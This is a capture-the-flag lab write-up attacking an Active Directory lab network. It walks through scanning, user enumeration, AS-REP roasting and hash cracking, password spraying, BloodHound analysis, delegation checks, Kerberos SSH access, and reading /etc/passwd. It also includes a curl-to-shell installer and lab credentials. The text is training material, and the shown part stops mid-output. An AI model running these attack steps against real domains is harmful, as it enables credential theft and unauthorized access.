POSTS

ERTLabs: Ifix-Tcen-Tcen

Ifix-Tcen-Tcen is a famous Italian onomatopoeia and cultural reference originating from the erotic *fotoromanzi* (photo-novels) of the 1970s and 1980s. In our case it's a multi-stage internal penetration test scenario focus on Active Directory.

ERTLabs: Ifix-Tcen-Tcen
10055 words · 48 min

Overview

Information

As you step into this lab, you’ll find yourself caught in a strange echo — a revival of characters from distant times: mischievous actresses from the ’80s, and extraterrestrials who once toyed with them in neon-lit dreams. But nostalgia quickly curdles into nightmare.

Lurking within this bizarre forest of memories and illusions is a multi-headed hound — a monstrous entity born of code, chaos, and forgotten signals.

It’s waiting for you.

Not just to find it… but to survive it.

Once it sinks its teeth into your mind, it doesn’t let go. And yet, the only way out… is through. Will you find the strength — and the madness — to tame the beast, mount it, and ride it through the tangled forest of the Dark Triangle? Or will you become just another echo, swallowed by its growl?

Instructions

To access the lab, you can start a VPN session, and connect to the jump Kali machine with the following credentials, it’s all you need:

VPN:

  • 🔹 Get your VPN connection in the ⁠ask-vpn-for-labs channel by using the !getvpn command.

Kali Jump machine:

  • 🔹 Server: 10.0.10.200
  • 🔹 User: red
  • 🔹 Password: I’mthebest

Your Target: 10.0.10.0/24

Please acknowledge that you read this message.

This Red Teaming lab is pretty easy

Note
  • the final flag changes every hour
  • It is not necessary (but you can try) to become a Domain Admin of the Active Directory domains.
  • No privilege escalation is required on Linux computers.
  • Many systems act as bridges to access other systems.
  • Many systems contain secrets that will help you reach other systems.
  • Follow the ethical guidelines of a Red Teamer: keep all systems clean, and do not leave programs or files behind that could assist other competitors.
  • The Kali machine is only for jumping; you don’t need to perform Privilege Escalation.
  • NO BRUTEFORCE IN LAB PLEASE - IT’S A RED TEAM LAB NOT LAMER LAB
  • NO BRUTEFORCE IN LAB PLEASE - IT’S A RED TEAM LAB NOT LAMER LAB
  • NO BRUTEFORCE IN LAB PLEASE - IT’S A RED TEAM LAB NOT LAMER LAB

We strongly encourage you to work like a true Red Teamer and avoid leaving tools or traces that could assist other participants.

Enjoy the adventure!

Enumeration

Grab our VPN package via Discord, then start it and let’s go:

$ sudo openvpn Downloads/EXTREME_RTLAB/user_978857802405675029.ovpn 

Nmap

$ nmap -sn --min-rate=1000 -T4 10.0.10.0/24 -oN target_network.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-01 11:44 JST
Nmap scan report for 10.0.10.7
Host is up (0.66s latency).
Nmap scan report for 10.0.10.33
Host is up (0.66s latency).
Nmap scan report for 10.0.10.34
Host is up (0.65s latency).
Nmap scan report for 10.0.10.116
Host is up (0.68s latency).
Nmap scan report for 10.0.10.200
Host is up (0.68s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 3.77 seconds
$ nmap -sCV -Pn -p- --min-rate=1000 -T4 10.0.10.7                 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-01 18:56 JST
Nmap scan report for 10.0.10.7
Host is up (0.27s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 51:90:95:ab:ac:a3:74:90:cf:99:33:f3:b1:ee:62:94 (ECDSA)
|_  256 bb:c2:a9:bc:1b:62:24:58:c7:59:25:79:1e:39:70:1d (ED25519)
80/tcp  open  http        Apache httpd 2.4.62
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 40    2025-04-25 23:38  offline.html
|_
|_http-title: Index of /
|_http-server-header: Apache/2.4.62 (Debian)
139/tcp open  netbios-ssn Samba smbd 4
445/tcp open  netbios-ssn Samba smbd 4
Service Info: Host: 10.0.10.7; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: GABRIEL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: 6s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-08-01T09:57:54
|_  start_date: N/A

Web server is running on 80/tcp and a file offline.html is present, there is also Samba then maybe some SMB shares can be interesting.

$ nmap -sCV -Pn -p- --min-rate=1000 -T4 10.0.10.33
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-01 19:03 JST
Nmap scan report for 10.0.10.33
Host is up (0.27s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-01 10:05:41Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49684/tcp open  msrpc         Microsoft Windows RPC
49703/tcp open  msrpc         Microsoft Windows RPC
63371/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4s
|_nbstat: NetBIOS name: SOC, NetBIOS user: <unknown>, NetBIOS MAC: 00:15:5d:38:01:25 (Microsoft)
| smb2-time: 
|   date: 2025-08-01T10:06:33
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Seems a Domain Controller as kerberos port is open (88/tcp).

$ nmap -sCV -Pn -p- --min-rate=1000 -T4 10.0.10.34
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-01 19:16 JST
Nmap scan report for 10.0.10.34
Host is up (0.27s latency).
Not shown: 65522 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49688/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
49719/tcp open  msrpc         Microsoft Windows RPC
49728/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-08-01T10:18:34
|_  start_date: N/A
|_nbstat: NetBIOS name: MARYLINJESS, NetBIOS user: <unknown>, NetBIOS MAC: 00:15:5d:38:01:27 (Microsoft)
|_clock-skew: 4s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
$ nmap -sCV -Pn -p- --min-rate=1000 -T4 10.0.10.116
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-01 19:03 JST
Nmap scan report for 10.0.10.116
Host is up (0.27s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.9p1 Debian 3 (protocol 2.0)
| ssh-hostkey: 
|   256 b4:75:83:96:b5:5d:e1:ef:2f:fd:1c:af:92:f1:f0:07 (ECDSA)
|_  256 4b:90:66:a2:39:8c:78:04:e7:a0:93:8d:d9:62:92:43 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
$ nmap -sCV -Pn -p- --min-rate=1000 -T4 10.0.10.200
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-01 19:03 JST
Nmap scan report for 10.0.10.200
Host is up (0.27s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE    VERSION
22/tcp  open  ssh        OpenSSH 9.9p1 Debian 3 (protocol 2.0)
| ssh-hostkey: 
|   256 4d:11:04:b5:b0:ed:e2:b1:76:a7:3a:ba:d2:c5:86:fc (ECDSA)
|_  256 19:45:f7:71:a8:00:04:45:d7:2c:39:ba:6b:19:40:60 (ED25519)
139/tcp open  tcpwrapped
445/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)

Now we install the latest version of Netexec to be sure to have all features like --generate-tgt:

$ sudo apt purge  netexec
$ curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
$ sudo apt install pipx git

Reload our shell so rust is added to our PATH:

$ pipx ensurepath
$ pipx install git+https://github.com/Pennyw0rth/NetExec

As we have many devices with SMB port open then let’s proceed a quick enumeration to grab information about Hostname, OS, SMB version etc and geenrate our hosts file too:

$ nxc smb 10.0.10.0/24 --generate-hosts-file ./hosts
SMB         10.0.10.7       445    GABRIEL          [*] Unix - Samba (name:GABRIEL) (domain:ifixtcentcen.loc) (signing:False) (SMBv1:False) 
SMB         10.0.10.33      445    SOC              [*] Windows 10 / Server 2019 Build 17763 x64 (name:SOC) (domain:ifixtcentcen.loc) (signing:True) (SMBv1:False)
SMB         10.0.10.34      445    MARYLINJESS      [*] Windows 10 / Server 2019 Build 17763 x64 (name:MARYLINJESS) (domain:ifixtcentcen.loc) (signing:False) (SMBv1:False)
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
$ echo '# IFIX-TCEN-TCEN' | sudo tee -a /etc/hosts; cat hosts | sudo tee -a /etc/hosts;
# IFIX-TCEN-TCEN
10.0.10.7     GABRIEL.ifixtcentcen.loc GABRIEL
10.0.10.33     SOC.ifixtcentcen.loc ifixtcentcen.loc SOC
10.0.10.34     MARYLINJESS.ifixtcentcen.loc MARYLINJESS

We install also the basic needs for Kerberos just in case:

$ sudo apt install krb5-user

We install also bloodyAD:

$ pipx install bloodyAD
  installed package bloodyad 2.1.21, installed using Python 3.13.5
  These apps are now globally available
    - bloodyAD
done! ✨ 🌟 ✨

GABRIEL - Act I

We grab quickly the file on the web server:

$ curl http://GABRIEL.ifixtcentcen.loc/offline.html    
Offline<br>
<br>
ilona@ifixtcentcen.loc

Found ilona@ifixtcentcen.loc as a potential account.

SOC - Act I

ASREPRoasting (ilona)

Quick user enumeration:

$ ./kerbrute_linux_amd64 userenum -d ifixtcentcen.loc --dc SOC /usr/share/seclists/Usernames/Names/names.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 08/01/25 - Ronnie Flathers @ropnop

2025/08/01 19:56:56 >  Using KDC(s):
2025/08/01 19:56:56 >  	SOC:88

2025/08/01 19:58:32 >  [+] VALID USERNAME:	 gabriel@ifixtcentcen.loc
2025/08/01 20:01:28 >  [+] VALID USERNAME:	 ilona@ifixtcentcen.loc
...

Try ASREPRoast attack without authentication to retrieve the Kerberos 5 AS-REP etype 23 hash of users without Kerberos pre-authentication required:

$ cat users.txt                                                              
gabriel
ilona
$ nxc ldap SOC.ifixtcentcen.loc -u users.txt -p '' --asreproast ASREProastables.txt    
LDAP        10.0.10.33      389    SOC              [*] Windows 10 / Server 2019 Build 17763 (name:SOC) (domain:ifixtcentcen.loc) (signing:None) (channel binding:No TLS cert) 
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
LDAP        10.0.10.33      389    SOC              $krb5asrep$23$ilona@IFIXTCENTCEN.LOC:ffa1f950d1a561830bc885421856e294$9e56f5173f0766d5ac516d8d7e9367882bbc49097ab96332714c35688414fa852cf72294f41cd3e3c306812eea69417d288e99fe6cd10f2054a554e7f591ee664fcd695cbe68cea36b7b1e8693418add9555e06a9d7a326c459673ecd032c3652591b1ea7e0e0547443556cbe251512e67504c7b9de25ab8dc6543e2872e59fd5f23066461eab339465da8c3d24c4d6854c01251c90278ff236f68a960ba7cdb7721d5c6f459984c6515b6e1c5a986206535b463b355c870724af101a9fc43b09cdc955c7eef2ee2ba2e36d327aac89cf7008c6e3f668b0b87263b7e6cb688c8d058feb4e2d5fb512376f4c6260e507dbc14897f

Found ilona

OR

$ impacket-GetNPUsers -usersfile users.txt -request -format hashcat -outputfile ASREProastables2.txt -dc-ip 10.0.10.33 'ifixtcentcen/'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] User gabriel doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$ilona@IFIXTCENTCEN:4455af59d85b384d0a058092143ea921$317df7a44abf3d8b5f097360421cee2a01e6a2a133a451afa126cdde2af090d50e67035df8ddea5f7e3bccb1ae6a5e9ed40368eeaec594bf8d29a65f62e5f83773a72ea7b9043a3ff413527c322223385561d002190fabbe2b5d66b896d60a39989a375383fc8ac68b4668d5f3a99eb729226cd32cfe1281f346d085b2089aed2442b08028d3ca885f1454f50a6fd2af4c28b4e84bd962248540ff9b56514a3fc1a0e511a7545d30a87196e7522d93e826e50f2336f0ae4e78cf9a9865bdc33195441e7d59ceb96a4e86137452d9ba31bb6d10552f90350e88b39daf04479451e93b8d4db71af39e6a2d833141b329eb

Crack with Hashcat:

$ cat ASREProastables.txt 
$krb5asrep$23$ilona@IFIXTCENTCEN.LOC:ffa1f950d1a561830bc885421856e294$9e56f5173f0766d5ac516d8d7e9367882bbc49097ab96332714c35688414fa852cf72294f41cd3e3c306812eea69417d288e99fe6cd10f2054a554e7f591ee664fcd695cbe68cea36b7b1e8693418add9555e06a9d7a326c459673ecd032c3652591b1ea7e0e0547443556cbe251512e67504c7b9de25ab8dc6543e2872e59fd5f23066461eab339465da8c3d24c4d6854c01251c90278ff236f68a960ba7cdb7721d5c6f459984c6515b6e1c5a986206535b463b355c870724af101a9fc43b09cdc955c7eef2ee2ba2e36d327aac89cf7008c6e3f668b0b87263b7e6cb688c8d058feb4e2d5fb512376f4c6260e507dbc14897f
$ hashcat -a 0 -m 18200 ASREProastables.txt /usr/share/wordlists/rockyou.txt       
hashcat (v6.2.6) starting
...
$krb5asrep$23$ilona@IFIXTCENTCEN.LOC:ffa1f950d1a561830bc885421856e294$9e56f5173f0766d5ac516d8d7e9367882bbc49097ab96332714c35688414fa852cf72294f41cd3e3c306812eea69417d288e99fe6cd10f2054a554e7f591ee664fcd695cbe68cea36b7b1e8693418add9555e06a9d7a326c459673ecd032c3652591b1ea7e0e0547443556cbe251512e67504c7b9de25ab8dc6543e2872e59fd5f23066461eab339465da8c3d24c4d6854c01251c90278ff236f68a960ba7cdb7721d5c6f459984c6515b6e1c5a986206535b463b355c870724af101a9fc43b09cdc955c7eef2ee2ba2e36d327aac89cf7008c6e3f668b0b87263b7e6cb688c8d058feb4e2d5fb512376f4c6260e507dbc14897f:!!!!Sweet!!!!
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$ilona@IFIXTCENTCEN.LOC:ffa1f950d1a561...14897f
...

Found ilona:!!!!Sweet!!!!

Check the authentication:

$ nxc smb SOC.ifixtcentcen.loc -u 'ilona' -p '!!!!Sweet!!!!'                                  
SMB         10.0.10.33      445    SOC              [*] Windows 10 / Server 2019 Build 17763 x64 (name:SOC) (domain:ifixtcentcen.loc) (signing:True) (SMBv1:False) 
SMB         10.0.10.33      445    SOC              [+] ifixtcentcen.loc\ilona:!!!!Sweet!!!! 

Works.

Re-try ASREPRoast attack with authentication:

$ nxc ldap SOC.ifixtcentcen.loc -u 'ilona' -p '!!!!Sweet!!!!' --asreproast ASREProastables2.txt --kdcHost SOC
LDAP        10.0.10.33      389    SOC              [*] Windows 10 / Server 2019 Build 17763 (name:SOC) (domain:ifixtcentcen.loc)
LDAP        10.0.10.33      389    SOC              [+] ifixtcentcen.loc\ilona:!!!!Sweet!!!! 
LDAP        10.0.10.33      389    SOC              [*] Total of records returned 1
...

No more finding

We generate our krb5.conf file and replace the original one:

$ nxc smb SOC.ifixtcentcen.loc -u 'ilona' -p '!!!!Sweet!!!!' --generate-krb5-file krb5.conf 
SMB         10.0.10.33      445    SOC              [*] Windows 10 / Server 2019 Build 17763 x64 (name:SOC) (domin:ifixtcentcen.loc) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.0.10.33      445    SOC              [+] ifixtcentcen.loc\ilona:!!!!Sweet!!!! 
$ sudo cp ./krb5.conf /etc/krb5.conf 
$ cat /etc/krb5.conf 

[libdefaults]
    dns_lookup_kdc = false
    dns_lookup_realm = false
    default_realm = IFIXTCENTCEN.LOC

[realms]
    IFIXTCENTCEN.LOC = {
        kdc = soc.ifixtcentcen.loc
        admin_server = soc.ifixtcentcen.loc
        default_domain = ifixtcentcen.loc
    }

[domain_realm]
    .ifixtcentcen.loc = IFIXTCENTCEN.LOC
    ifixtcentcen.loc = IFIXTCENTCEN.LOC

Password Spray attacking

Enumeration of the Domain users:

$ nxc smb SOC.ifixtcentcen.loc -u 'ilona' -p '!!!!Sweet!!!!' --users                                                                     
SMB         10.0.10.33      445    SOC              [*] Windows 10 / Server 2019 Build 17763 x64 (name:SOC) (domain:ifixtcentcen.loc) (signing:True) (SMBv1:False) 
SMB         10.0.10.33      445    SOC              [+] ifixtcentcen.loc\ilona:!!!!Sweet!!!! 
SMB         10.0.10.33      445    SOC              -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         10.0.10.33      445    SOC              Administrator                 2025-04-24 15:36:50 0       Built-in account for administering the computer/domain 
SMB         10.0.10.33      445    SOC              Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         10.0.10.33      445    SOC              krbtgt                        2025-04-24 16:25:05 0       Key Distribution Center Service Account 
SMB         10.0.10.33      445    SOC              platinette                    2025-04-25 05:13:09 0        
SMB         10.0.10.33      445    SOC              ilona                         2025-04-25 05:03:50 0        
SMB         10.0.10.33      445    SOC              schicchi                      2025-04-27 14:13:46 0        
SMB         10.0.10.33      445    SOC              malone                        2025-04-25 17:53:50 0        
SMB         10.0.10.33      445    SOC              luanaborgia                   2025-04-25 17:55:49 0        
SMB         10.0.10.33      445    SOC              selen                         2025-04-25 17:55:58 0        
SMB         10.0.10.33      445    SOC              babypozzi                     2025-04-26 06:49:27 0        
SMB         10.0.10.33      445    SOC              [*] Enumerated 10 local users: IFIXTCENTCEN
$ cat enum_users.txt                               
SMB         10.0.10.33      445    SOC              Administrator                 2025-04-24 15:36:50 0       Built-in account for administering the computer/domain 
SMB         10.0.10.33      445    SOC              Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         10.0.10.33      445    SOC              krbtgt                        2025-04-24 16:25:05 0       Key Distribution Center Service Account 
SMB         10.0.10.33      445    SOC              platinette                    2025-04-25 05:13:09 0        
SMB         10.0.10.33      445    SOC              ilona                         2025-04-25 05:03:50 0        
SMB         10.0.10.33      445    SOC              schicchi                      2025-04-27 14:13:46 0        
SMB         10.0.10.33      445    SOC              malone                        2025-04-25 17:53:50 0        
SMB         10.0.10.33      445    SOC              luanaborgia                   2025-04-25 17:55:49 0        
SMB         10.0.10.33      445    SOC              selen                         2025-04-25 17:55:58 0        
SMB         10.0.10.33      445    SOC              babypozzi                     2025-04-26 06:49:27 0        
$ cat enum_users.txt | awk '{print $5}' > users.txt
$ cat users.txt                                    
Administrator
Guest
krbtgt
platinette
ilona
schicchi
malone
luanaborgia
selen
babypozzi

Let’s proceed a password spray attack against all users:

$ nxc smb SOC.ifixtcentcen.loc -u users.txt -p '!!!!Sweet!!!!' --continue-on-success
SMB         10.0.10.33      445    SOC              [*] Windows 10 / Server 2019 Build 17763 x64 (name:SOC) (domain:ifixtcentcen.loc) (signing:True) (SMBv1:False) 
SMB         10.0.10.33      445    SOC              [-] ifixtcentcen.loc\Administrator:!!!!Sweet!!!! STATUS_LOGON_FAILURE 
SMB         10.0.10.33      445    SOC              [-] ifixtcentcen.loc\Guest:!!!!Sweet!!!! STATUS_LOGON_FAILURE 
SMB         10.0.10.33      445    SOC              [-] ifixtcentcen.loc\krbtgt:!!!!Sweet!!!! STATUS_LOGON_FAILURE 
SMB         10.0.10.33      445    SOC              [-] ifixtcentcen.loc\platinette:!!!!Sweet!!!! STATUS_LOGON_FAILURE 
SMB         10.0.10.33      445    SOC              [+] ifixtcentcen.loc\ilona:!!!!Sweet!!!! 
SMB         10.0.10.33      445    SOC              [-] ifixtcentcen.loc\schicchi:!!!!Sweet!!!! STATUS_LOGON_FAILURE 
SMB         10.0.10.33      445    SOC              [-] ifixtcentcen.loc\malone:!!!!Sweet!!!! STATUS_LOGON_FAILURE 
SMB         10.0.10.33      445    SOC              [-] ifixtcentcen.loc\luanaborgia:!!!!Sweet!!!! STATUS_LOGON_FAILURE 
SMB         10.0.10.33      445    SOC              [-] ifixtcentcen.loc\selen:!!!!Sweet!!!! STATUS_LOGON_FAILURE 
SMB         10.0.10.33      445    SOC              [-] ifixtcentcen.loc\babypozzi:!!!!Sweet!!!! STATUS_LOGON_FAILURE 
SMB         10.0.10.33      445    SOC              [-] ifixtcentcen.loc\:!!!!Sweet!!!! STATUS_LOGON_FAILURE 

Nothing, no one reuse the same password.

BloodHound

$ nxc ldap SOC.ifixtcentcen.loc -u 'ilona' -p '!!!!Sweet!!!!' --bloodhound -c all,LoggedOn --dns-server 10.0.10.33                           
LDAP        10.0.10.33      389    SOC              [*] Windows 10 / Server 2019 Build 17763 (name:SOC) (domain:ifixtcentcen.loc) (signing:None) (channel binding:No TLS cert) 
LDAP        10.0.10.33      389    SOC              [+] ifixtcentcen.loc\ilona:!!!!Sweet!!!! 
LDAP        10.0.10.33      389    SOC              Resolved collection methods: dcom, group, psremote, container, rdp, session, localadmin, trusts, acl, loggedon, objectprops
LDAP        10.0.10.33      389    SOC              Done in 1M 10S
LDAP        10.0.10.33      389    SOC              Compressing output into /home/user/.nxc/logs/SOC_10.0.10.33_2025-08-02_164454_bloodhound.zip

If first time we use BloodHound Community Edition. then follow the step below to install it (better with Docker Desktop, but if under VMWare then not possible to do it because if Hypervisor limitation):

sudo apt update
sudo apt install ca-certificates curl
sudo install -m 0755 -d /etc/apt/keyrings
sudo curl -fsSL https://download.docker.com/linux/debian/gpg -o /etc/apt/keyrings/docker.asc
sudo chmod a+r /etc/apt/keyrings/docker.asc
  • Add the repository to Apt sources (for derivative distro, such as Kali Linux):
echo \
  "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/debian \
  bookworm stable" | \
  sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt update
  • Install the Docker packages:
$ sudo apt install docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin
  • Download the Docker Compose YAML file and save it to a directory where you’d like to run BHCE:
$ mkdir BHCE
$ cd BHCE 
$ curl -L https://ghst.ly/getbhce > ./docker-compose.yml
  • Navigate to the folder with the saved docker-compose.yaml file and run docker compose pull && docker compose up:
$ sudo docker compose pull && sudo docker compose up
  • Locate the randomly generated password in the terminal output of Docker Compose:
...
bloodhound-1  | {"time":"2025-08-02T08:26:57.441818301Z","level":"INFO","message":"###################################################################"}
bloodhound-1  | {"time":"2025-08-02T08:26:57.441844129Z","level":"INFO","message":"#                                                                 #"}
bloodhound-1  | {"time":"2025-08-02T08:26:57.441847536Z","level":"INFO","message":"# Initial Password Set To:    O9T0DPlS7bDOZu9YP7xMz8gK5njcU0ZU    #"}
bloodhound-1  | {"time":"2025-08-02T08:26:57.441850591Z","level":"INFO","message":"#                                                                 #"}
bloodhound-1  | {"time":"2025-08-02T08:26:57.441852845Z","level":"INFO","message":"###################################################################"}
...
  • In a browser, navigate to http://localhost:8080/ui/login.
    • Login with the username admin and the randomly generated password from the logs (then change the password during the first login):

image

image

Then ingest our collector file:

image

image

Then we can start AD analysis.

Domain users:

image

Domain computers:

image

image

The user ILONA has the constrained delegation permission AllowedToDelegate to the computer GABRIEL$.

image

VANESSADELRIO$ is the computer of ilona.

Check:

$ impacket-findDelegation 'ifixtcentcen.loc/ilona:!!!!Sweet!!!!'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

AccountName     AccountType  DelegationType                      DelegationRightsTo             SPN Exists 
--------------  -----------  ----------------------------------  -----------------------------  ----------
ilona           Person       Constrained w/ Protocol Transition  host/GABRIEL                   Yes        
ilona           Person       Constrained w/ Protocol Transition  host/GABRIEL.IFIXTCENTCEN.LOC  Yes        
VANESSADELRIO$  Computer     Unconstrained                       N/A                            No         

OR

$ bloodyAD -d ifixtcentcen.loc -u 'ilona' -p '!!!!Sweet!!!!' --host SOC.ifixtcentcen.loc get object 'ilona' --attr 'msds-AllowedToDelegateTo'

distinguishedName: CN=ilona staller,CN=Users,DC=ifixtcentcen,DC=loc
msDS-AllowedToDelegateTo: host/GABRIEL; host/GABRIEL.IFIXTCENTCEN.LOC

Confirmed, SPN is set and msds-AllowedToDelegateTo is host/GABRIEL.IFIXTCENTCEN.LOC then we can modify the target service name to impersonate other domain user.

image

The user ILONA is a member of the LINUX group then maybe she can access to linux server.

We briefly check all users that we have found previously with Netexec and nothing is really interesting, except maybe:

image

GABRIEL$ is a Linux PC.

image

2 users malone and babypozzi are members of the same group COMPARSE.

GABRIEL - Act II

As we have pwned ilona and she can access to Linux PC because she is a member of the group LINUX then we try to access first to the gabriel PC:

$ sshpass -p '!!!!Sweet!!!!' ssh -o 'StrictHostKeyChecking=accept-new' -o 'StrictHostKeyChecking=no' ilona@GABRIEL.ifixtcentcen.loc
ilona@gabriel.ifixtcentcen.loc: Permission denied (gssapi-keyex,gssapi-with-mic).

Interesting, seems only Kerberos authentication is allowed.

Modify our SSH configuration /etc/ssh/sshd_config to allow Kerberos and GSSAPI authentication:

image

$ cat /etc/ssh/sshd_config
...
# Kerberos options
#KerberosAuthentication no
KerberosAuthentication yes
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no

# GSSAPI options
#GSSAPIAuthentication no
GSSAPIAuthentication yes
#GSSAPICleanupCredentials yes
GSSAPICleanupCredentials yes
#GSSAPIStrictAcceptorCheck yes
#GSSAPIKeyExchange no
...

Then reload:

$ sudo systemctl restart ssh

Get a TGT:

$ nxc smb SOC.ifixtcentcen.loc -u 'ilona' -p '!!!!Sweet!!!!' --generate-tgt ilona 

OR

$ impacket-getTGT -dc-ip SOC.ifixtcentcen.loc ifixtcentcen.loc/ilona:'!!!!Sweet!!!!'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in ilona.ccache

Export the ticket to the global environement variable:

$ export KRB5CCNAME=ilona.ccache
$ klist
Ticket cache: FILE:ilona.ccache
Default principal: ilona@IFIXTCENTCEN.LOC

Valid starting       Expires              Service principal
08/05/2025 16:47:38  08/05/2025 17:47:38  krbtgt/IFIXTCENTCEN.LOC@IFIXTCENTCEN.LOC
	renew until 08/06/2025 16:47:33

Then let’s connect to GABRIEL:

$ ssh ilona@GABRIEL.ifixtcentcen.loc
Linux gabriel 6.1.0-33-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.133-1 (2025-04-10) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
ilona@gabriel:~$ id
uid=10000(ilona) gid=10006(linux) groups=10006(linux)
ilona@gabriel:~$ cat /etc/ssh/sshd_config | grep AllowUsers
AllowUsers ilona schicchi

Found that schicchi can also be able to login to this PC.

We found also fox and IFIXTCENTCEN:

ilona@gabriel:~$ cd /home
ilona@gabriel:/home$ ls -la
total 16
drwxr-xr-x  4 root root 4096 Apr 25 18:19 .
drwxr-xr-x 18 root root 4096 Apr 24 18:01 ..
drwx------  2 fox  fox  4096 Apr 24 18:54 fox
drwxr-xr-x  9 root root 4096 Apr 25 20:18 IFIXTCENTCEN

We have READ access to IFIXTCENTCEN folder.

ilona@gabriel:/home$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
